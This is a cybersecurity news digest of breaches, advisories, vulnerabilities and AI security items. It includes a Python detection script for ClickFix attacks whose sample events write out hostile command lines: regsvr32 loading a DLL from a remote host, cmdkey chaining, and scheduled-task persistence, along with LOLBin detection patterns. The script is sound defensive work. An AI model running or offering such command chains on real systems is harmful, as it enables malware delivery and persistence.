Today's Cybersecurity Pulse

CISA adds critical Android and Linux flaws to KEV catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) listed two high‑severity vulnerabilities in its Known Exploited Vulnerabilities catalog: Android CVE‑2025‑48595, an integer overflow that enables privilege escalation on Android 14‑16 without user interaction, patched in June 2026; and Linux CVE‑2022‑0492, a cgroups v1 release_agent flaw that allows local privilege escalation (and container escape where a container can mount cgroupfs) and is likewise deemed actively exploited.
Also developing:
By the numbers: Ingeteam secures $82.5M loan from EIB for renewable energy R&D
Secure Medical Image Cryptanalysis with Quantum Neural Networks for IoT-Enabled Cloud Storage
The paper introduces a unified security framework for IoT‑enabled medical imaging that blends hybrid post‑quantum encryption, a quantum neural network for cryptanalysis, federated deep learning, and secure cloud storage. The hybrid scheme merges post‑quantum cryptography, chaos‑based diffusion, and AES‑GCM, while the Federated Quantum Neural Cryptanalysis Network (FQNC‑Net) identifies attacks with high precision. Tested on KiTS19, KiTS21 and KiTS23 datasets, the system reaches 97.84% accuracy and a 98.12% attack‑detection rate, with cloud latency under one second and 99.92% integrity verification. The results demonstrate a viable path for privacy‑preserving, quantum‑resilient healthcare IoT deployments.
Goodwin and Cooley Earn Spot on Cybersecurity Docket’s Incident Response Elite 2026
Goodwin and Cooley secured placements on Cybersecurity Docket’s Incident Response Elite list for 2026, with three Goodwin partners and four Cooley partners recognized. The selections underscore the growing premium placed on data‑breach response capabilities across global law firms.
Ex-Orrick Partner Withdraws Data‑Breach Suit Hours After Filing
Joseph Casillas, a former Orrick Herrington & Sutcliffe employee, voluntarily dismissed his data‑breach lawsuit against the firm just hours after filing. The move leaves the case open for re‑filing in another venue and highlights the difficulty of pursuing negligence claims...
Phishing Attacks Surge, Spreading Anxiety Across All Channels
It’s hard to overstate the acceleration in frequency, cleverness and diversity of phishing and targeted exploits across every media channel over the past month or so. I have experienced it personally, but also via friends and family, several of whom have...
KelpDAO Attack Timeline Discrepancy Challenges LayerZero Claim
Did something change between December of 2024 and now? Because unless I'm confused, this is saying that the attack on KelpDAO could not have happened as LayerZero described it.
Cyera to Acquire AI Data Startup Ryft in Deal Valued Up to $130 Million
Cyera, a data‑security company, announced the acquisition of Ryft, a two‑year‑old AI data startup, in a transaction valued at up to $130 million. The deal highlights the accelerating convergence of artificial‑intelligence capabilities with cybersecurity solutions.
Google Rolls Out Gemini Enterprise Agent Platform and 8th‑Gen TPUs, Backed by Up to $185 B AI Spend
Google announced the Gemini Enterprise Agent Platform at Cloud Next, pairing it with eighth‑generation TPU chips and a $175‑$185 billion AI capex plan for 2026. The suite targets autonomous workflow automation and security, promising faster threat detection and tighter governance for...
Indirect Prompt‑Injection Attacks Emerge as Top Threat to Enterprise LLMs
Security researchers have flagged indirect prompt‑injection attacks as the leading vulnerability for large language models (LLMs). The rise of enterprise AI tools such as Zeta Global’s Athena, built on OpenAI technology, amplifies the urgency for robust mitigation strategies.

‘AiFrame’ Browser Attacks Continue with Fake Authenticator, Converter Extensions
Six new malicious Chrome extensions tied to the AiFrame campaign have been uncovered, expanding the original set of 32 AI‑impersonating add‑ons. The extensions—including a fake two‑factor authenticator, an AI‑to‑PDF converter and a HEIC‑to‑JPG tool—have roughly 134,000 combined installs and request...

ADT Confirms Data Breach After ShinyHunters Leak Threat
ADT confirmed a data breach after the ShinyHunters extortion group threatened to expose stolen records. The company detected unauthorized access on April 20, 2024, and found that personal information—names, phone numbers, addresses, and in some cases dates of birth and the...
Iran Cyber Campaign Targets Critical Infrastructure’s Weakest Links
Operation Epic Fury marks Iran’s shift from espionage to disruptive cyber attacks on U.S. critical infrastructure. Iranian‑affiliated APT groups are actively exploiting internet‑facing programmable logic controllers in water, energy and government sectors, causing operational disruptions and financial loss. The campaign...

Some Brands Are Safe From The US' Foreign Router Ban, But No One Seems To Know Why
On March 23, 2026 the FCC added foreign‑made consumer routers to its Covered List, effectively banning any new router not manufactured in the United States. Approximately 60% of U.S. routers are sourced from China, so the rule sent shockwaves through the market....

Rev. 3 Is Coming – Start Preparing for the Next CMMC Requirement
The Department of Defense’s Cybersecurity Maturity Model Certification (CMMC) will soon require compliance with NIST SP 800‑171 Revision 3, which supersedes the current Rev 2 baseline. Rev 3, released in May 2024, adds three new control families—Planning, System and Services Acquisition, and Supply Chain Risk Management—while reducing the...

Firestarter Malware Survives Cisco Firewall Updates, Security Patches
U.S. and U.K. cyber agencies have identified a custom backdoor, Firestarter, that remains active on Cisco Firepower and ASA firewalls even after firmware updates and security patches. The malware exploits CVE‑2025‑20333 and CVE‑2025‑20362 to gain initial access, then uses the...

CMMC Won’t Fail on Controls. It Will Fail on Proof.
The Cybersecurity Maturity Model Certification (CMMC) is evolving from a checklist of controls to a verification regime that demands provable evidence. Contractors often have the right technical safeguards but lack the ability to produce continuous, defensible proof on demand. This...

ShinyHunters Claims Udemy Data Breach of 1.4M Users
ShinyHunters, a financially motivated threat group, alleges it has exfiltrated over 1.4 million Udemy user records and is demanding a ransom before a public leak. The claim surfaced on April 24, 2026, with a deadline of April 27 for Udemy to respond. While...

New ClickFix Attack Hides in Native Windows Tools to Reduce Detection Risk
CyberProof uncovered a new ClickFix campaign that tricks users into running malicious code via a fake CAPTCHA prompt. The attack leverages native Windows utilities cmdkey and regsvr32—known as LOLBins—to download a DLL from a remote server and register a scheduled...
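The chain described above (a fake CAPTCHA gets the victim to paste a command into the Run dialog, which spawns a shell that chains cmdkey, regsvr32 and schtasks) is what an endpoint detection should key on. The following is an added example, not code from CyberProof's report or from the page: it parses a few constructed process‑creation events in a flattened Sysmon‑style key=value format and flags the LOLBin patterns. The exact command‑line forms (a UNC/WebDAV source for regsvr32, the task name, the IP and paths) are assumptions for illustration, not indicators from the campaign.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (Sysmon Event ID 1 style, flattened
# to key=value). Events 0-2 model one ClickFix chain; 3-4 are benign controls.
# IPs, paths and task names are illustrative, not indicators from the campaign.
SAMPLE_EVENTS = [
    r'EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\cmd.exe '
    r'CommandLine="cmd.exe /c cmdkey /generic:verify /user:human /pass:x & regsvr32 /s \\198.51.100.7@80\pub\v.dll"',
    r'EventID=1 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\regsvr32.exe '
    r'CommandLine="regsvr32 /s \\198.51.100.7@80\pub\v.dll"',
    r'EventID=1 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\schtasks.exe '
    r'CommandLine="schtasks /create /tn Updater /tr \"regsvr32 /s C:\Users\Public\v.dll\" /sc minute /mo 5 /f"',
    r'EventID=1 ParentImage=C:\Windows\System32\services.exe Image=C:\Windows\System32\svchost.exe '
    r'CommandLine="svchost.exe -k netsvcs -p"',
    r'EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\regsvr32.exe '
    r'CommandLine="regsvr32 /s C:\ProgramData\Vendor\vendor.dll"',
]

# key=value tokens; a quoted value may contain \" escapes (the schtasks /tr case)
_KV = re.compile(r'(\w+)=(?:"((?:[^"\\]|\\.)*)"|(\S+))')

LOLBINS = ('cmdkey', 'regsvr32', 'schtasks', 'mshta', 'rundll32', 'certutil', 'bitsadmin')
SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'mshta.exe'}

# Each pattern is applied to the whole command line, because a ClickFix paste
# usually chains several LOLBins inside one "cmd.exe /c ... & ..." line.
CMDLINE_RULES = {
    # regsvr32 whose source is an http(s) URL or a UNC/WebDAV path (\\host@port\...)
    'regsvr32_remote_source': re.compile(
        r'\bregsvr32(?:\.exe)?\b[^&|]*?(?:https?://|\\\\[^\s\\]+\\)', re.I),
    # cmdkey is almost never typed by end users; inside a chain it is a strong signal
    'cmdkey_in_chain': re.compile(r'\bcmdkey(?:\.exe)?\b', re.I),
    # schtasks creating a task whose action loads a DLL through a LOLBin
    'schtasks_create_dll': re.compile(
        r'\bschtasks(?:\.exe)?\b[^&|]*/create[^&|]*(?:regsvr32|rundll32|\.dll)', re.I),
}


def parse_event(line: str) -> dict:
    """Parse one flattened event line into a dict, unescaping \\" in quoted values."""
    ev = {}
    for key, quoted, bare in _KV.findall(line):
        ev[key] = quoted.replace('\\"', '"') if quoted else bare
    return ev


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower() if path else ''


def classify(ev: dict) -> list:
    """Return the names of every rule the event matches (empty list if benign)."""
    cl = ev.get('CommandLine', '')
    hits = [name for name, rx in CMDLINE_RULES.items() if rx.search(cl)]
    parent, image = _basename(ev.get('ParentImage', '')), _basename(ev.get('Image', ''))
    # explorer.exe (Run dialog) spawning a shell that chains commands and names a
    # LOLBin is the paste-and-run pattern itself, independent of the payload
    chained = '&' in cl or ';' in cl
    names_lolbin = any(re.search(r'\b%s\b' % b, cl, re.I) for b in LOLBINS)
    if parent == 'explorer.exe' and image in SHELLS and chained and names_lolbin:
        hits.append('explorer_spawned_chained_lolbin')
    return hits


def detect_clickfix(lines) -> list:
    """Scan process-creation events; return one finding per suspicious event."""
    findings = []
    for i, line in enumerate(lines):
        ev = parse_event(line)
        if ev.get('EventID') != '1':
            continue
        rules = classify(ev)
        if rules:
            severity = 'high' if 'regsvr32_remote_source' in rules or len(rules) >= 2 else 'medium'
            findings.append({'index': i, 'image': _basename(ev.get('Image', '')),
                             'rules': rules, 'severity': severity})
    return findings


if __name__ == '__main__':
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {f['index']}: {f['image']} [{f['severity']}] {', '.join(f['rules'])}")
```

Only the first three events fire: the explorer-to-cmd chain, the child regsvr32 with a remote source, and the schtasks persistence. The benign service host and the local vendor DLL registration from explorer stay quiet, which is the point of keying on the remote source and the chaining rather than on regsvr32 alone.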
Microsoft Fabric Roadshow Unveils 2026 Enhancements for Integration, Analytics and Governance
At a February 16 roadshow in Brisbane, Microsoft announced a suite of 2026 updates to its Fabric data platform, emphasizing tighter governance, new AI catalog features, and expanded support for migrating from Azure Data Factory and legacy tools. The enhancements...
UK and Global Agencies Warn China-Linked Hackers Exploit Everyday IoT Devices to Target Firms
The UK’s National Cyber Security Centre, together with agencies in nine other nations, warned that China‑backed hackers are turning ordinary IoT gear into covert botnets, with a single Chinese firm compromising roughly 200,000 devices worldwide. The advisory marks a shift...

AHA Urges Delay on TEFCA Individual Access SOP over Patient Privacy Concerns
The American Hospital Association (AHA) has urged the Sequoia Project to postpone the rollout of version 3.0 of the Trusted Exchange Framework and Common Agreement (TEFCA) Individual Access Services (IAS) Standard Operating Procedures, originally slated for August 2027. The AHA argues that...

Advisory Details Shifting Tactics of Chinese Cyber Actors Using Covert Networks for Malicious Activity
A joint advisory from U.S. and international cyber agencies warns that China‑aligned threat actors have shifted to large‑scale covert networks of compromised routers, IoT devices, and other edge hardware. These hidden botnets let attackers mask origins, evade defenses, and target...

Iran’s Cyber Threat May Be Less ‘Shock and Awe’ than ‘Low and Slow,’ Officials Say
After a CISA advisory warned of Iranian‑linked cyber actors targeting U.S. critical infrastructure, officials say the threat is more likely low‑and‑slow opportunistic intrusions than a shock‑and‑awe campaign. Former NSA director Tim Haugh and cyber‑security veteran Kevin Mandia note Iran’s tactics...

Shell Security Plugin
The new Shell Security plugin links OpenClaw’s built‑in security audit with KiloCode’s Security Advisor API, turning raw JSON findings into a prioritized, plain‑language remediation report delivered inside chat platforms like Slack or Telegram. It runs the audit locally, sends only...

IHS Leaders Tie Cybersecurity Directly to Patient Care
At the 2026 Splunk GovSummit, Indian Health Service leaders declared cybersecurity a core component of patient care. Serving 2.7 million patients across 37 states, IHS ties security to clinical continuity, emphasizing real‑time monitoring and resilience in remote and urban facilities. The...
Netherlands Weighs Data Sovereignty Concerns with Solvinity Digital Identity Contract
The Dutch House of Representatives voted to block an extension of the DigiD contract with Solvinity if the company is acquired by U.S. IT services firm Kyndryl. Lawmakers cite data sovereignty and national security concerns, fearing U.S. jurisdiction could expose...

ADT Says Customer Data Stolen in Cyber Intrusion
ADT disclosed a cyber intrusion that stole personal data—including names, addresses, dates of birth and the last four digits of Social Security numbers and tax IDs—from customers and prospects. The ShinyHunters group claimed to have taken 10 million records and threatened...

LPL Claims Hackers Accessed Client Accounts Through Advisors’ Devices
LPL Financial disclosed a cybersecurity breach that compromised advisor devices on November 10, 2025, affecting 1,581 client accounts. Malware delivered via phishing gave hackers unauthorized access to the firm’s web‑based advisor portal, leading to illicit securities trades and financial transfers. LPL halted...
Delivering an Impactful 15-Minute Board Briefing
Cyber risk oversight has shifted to audit committees, now covering 79% of S&P 500 firms, up from 71.2% two years earlier. Board briefings are limited to 10‑15 minutes each quarter, forcing CISOs to move from data‑heavy dashboards to concise, business‑focused narratives....

Four Cooley Partners Honored Among Elite in Data Breach Response
Four Cooley partners—Travis LeBlanc, Patrick Van Eecke, Guadalupe Sampedro and Kristen Mathews—were named to Cybersecurity Docket’s Incident Response Elite for 2026, a global list that spotlights top data‑breach response lawyers. LeBlanc earned his ninth appearance, Van Eecke his third, Sampedro...
EU Business Lobby Backs Digital Wallet Plan, Calls for Proportionate Identity Rules
Europe’s leading business lobby, BusinessEurope, has endorsed the European Business Wallet (EBW) proposal, highlighting its potential to cut red tape and streamline compliance across tax, AML and corporate reporting. The group stresses that digital identity verification must be proportionate, low‑cost...

New BlackFile Extortion Group Linked to Surge of Vishing Attacks
A new financially motivated hacking group called BlackFile, also known as CL‑CRI‑1116, UNC6671 and Cordial Spider, has been linked to a wave of vishing‑based credential theft and extortion targeting retail and hospitality firms since February 2026. The attackers impersonate IT...
DeFi Must Harden Infrastructure and Adopt Transparent Governance
Takeaways from the Kelp crisis so far: 1. DeFi needs to be military-grade finance -- it has state actors going after it and the infrastructure better be strong enough to fight this enemy. right now, it's not. Stop using centralized infra, with...
CISA Last in Line for Access to Anthropic Mythos
Anthropic’s Claude Mythos, a bug‑hunting AI model, is being rolled out through a tightly controlled initiative called Project Glasswing. While the NSA and the Department of Commerce have received access, the Cybersecurity and Infrastructure Security Agency (CISA) remains excluded. Bloomberg...

Microsoft to Roll Out Entra Passkeys on Windows in Late April
Microsoft announced that Entra passkey support will roll out to Windows devices starting in late April 2026, with general availability slated for mid‑June. The feature extends phishing‑resistant, passwordless authentication to corporate, personal and shared Windows machines, even when they are...

The Router on the Shelf Is Now a National Security Problem
A twelve‑agency joint advisory released on April 23 warns that China‑linked groups are weaponizing compromised home and small‑office routers, IoT gear, and smart devices at industrial scale. The advisory, co‑authored by CISA, the FBI, the DoD Cyber Crime Center and...

New ‘Pack2TheRoot’ Flaw Gives Hackers Root Linux Access
A new vulnerability called Pack2TheRoot (CVE‑2026‑41651) in the PackageKit daemon allows local users to gain root privileges by installing or removing system packages. The flaw, rated CVSS 8.8, has existed since 2014 across PackageKit versions 1.0.2‑1.3.4 and impacts major Linux distributions...
AI-Generated Code Is Vulnerable
Researchers at Georgia Tech's Systems Software & Security Lab have unveiled the Vibe Security Radar, a tool that scans public vulnerability databases to identify code defects introduced by generative AI tools such as Claude, Gemini, and GitHub Copilot. The radar...

FIRESTARTER Backdoor Hit Federal Cisco Firepower Device, Survives Security Patches
U.S. CISA disclosed that a federal agency’s Cisco Firepower appliance was compromised in September 2025 by a new backdoor malware dubbed FIRESTARTER. The implant leverages two recently patched vulnerabilities (CVE‑2025‑20333 and CVE‑2025‑20362) to gain root access and persists through firmware updates...

China Now as Good as U.S. at Offensive Cyber: Dutch Intelligence
Dutch intelligence agencies warned that China’s offensive cyber capability now matches that of the United States. The AIVD’s annual report highlighted a sophisticated Chinese national program that evades detection, with only a tiny fraction of attacks being identified. Similar capabilities...
AI Tools Empower Cybercriminals to Steal Money and Data
AI tools are making it easier than ever for online criminals to trick people and steal money and valuable confidential data.

How CrowdStrike Is Helping The Industry To Withstand AI-Driven Vulnerability Deluge: Exec
Cybersecurity leader CrowdStrike unveiled Project QuiltWorks, an initiative that merges its Falcon Spotlight platform with multiple frontier AI models to accelerate vulnerability discovery and remediation. Prompted by Anthropic’s Claude Mythos disclosure, the program aims to pre‑empt AI‑driven exploit spikes by...
Vulnerability Economics 2026: Deep Insights and Future Outlook
One of my favorite humans talking about one of my favorite topics: Mark Dowd goes deep into what vulnerability economics looks like in 2026, and where he thinks it goes from here. In true TBP-style it's long (2h) but it's...
Parallel AI Agents and Result Aggregation Boost Offensive Success
Sometimes the success of using AI agents for offense comes from using them in multiple or parallel rounds. With different models. And aggregating the results.

FCA Publishes Cyber Co-Ordination Group Insights
On 24 April 2026 the UK Financial Conduct Authority released insights from its 2025 Cyber Coordination Group, which convenes up to 140 financial firms to share best practices on cyber resilience. The FCA emphasized senior‑level involvement in incident‑response drills, live‑environment testing, and...
New Wiper Links Venezuela Oil Firm to December Hack
Mystery around the Venezuelan cyberattack deepens with the new discovery of a "highly destructive" wiper. Hard-coded into the wiper was the domain for Venezuela's state-run oil company, suggesting the wiper may have been used in December's attack against the company https://t.co/v0gHlATx4w
Microsoft Now Lets You Pause Windows Updates Indefinitely
Microsoft will let you pause Windows Updates indefinitely, 35 days at a time. This is a good change, and it makes sense security wise that Microsoft wouldn’t let you totally disable updates https://t.co/rs0FWzHBtZ
AI Agents Are Already Inside Your Digital Infrastructure
A new Cloud Security Alliance report finds that 82% of enterprises host unknown AI agents and nearly two‑thirds have suffered AI‑agent‑related incidents in the last year, creating a growing "retirement debt" of lingering permissions. The surge in autonomous agents is...
GitHub Actions Less Secure Than Private Lambda Deployments
Hardening GitHub Actions: Lessons from Recent Attacks | Wiz Blog ~ really good article but I wrote about why I won’t use GitHub actions at all on a cloud instance. Not as many protections as you can get with Lambda...
Common Insecure Default Becomes De Facto Standard
What I found sharp in this segment: @TuongvyLe12's point that when 47% of teams choose the same insecure default, it stops being an individual choice and starts looking like industry standard architecture. @kkirkbos @DEXintheCityPod https://t.co/dgATW3fh8c
Cirrascale to Offer On-Prem Google Gemini Models
Cirrascale Cloud Services will deliver Google Gemini large‑language models on‑premise through Google Distributed Cloud, using Dell‑built appliances equipped with Intel CPUs and Nvidia GPUs. The offering supports fully air‑gapped or connected deployments, letting government, defense, finance, healthcare and education customers...